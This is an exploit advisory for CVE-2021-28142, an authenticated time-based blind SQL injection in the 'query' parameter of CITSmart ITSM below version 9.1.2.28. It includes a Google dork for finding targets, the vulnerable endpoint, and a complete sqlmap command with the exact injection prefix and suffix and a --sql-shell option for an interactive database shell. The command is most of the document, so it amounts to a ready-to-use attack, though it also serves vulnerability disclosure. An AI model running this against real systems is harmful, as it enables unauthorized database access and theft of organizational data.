# Exploit Title: CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated) # Google Dork: "citsmart.local" # Date: 11/03/2021 # Exploit Author: skysbsb # Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html # Version: < 9.1.2.28 # CVE : CVE-2021-28142 To exploit this flaw it is necessary to be authenticated. URL vulnerable: https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale Param vulnerable: query Sqlmap usage: sqlmap -u " https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell Affected versions: < 9.1.2.28 Fixed versions: >= 9.1.2.28 Vendor has acknowledge this vulnerability at ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)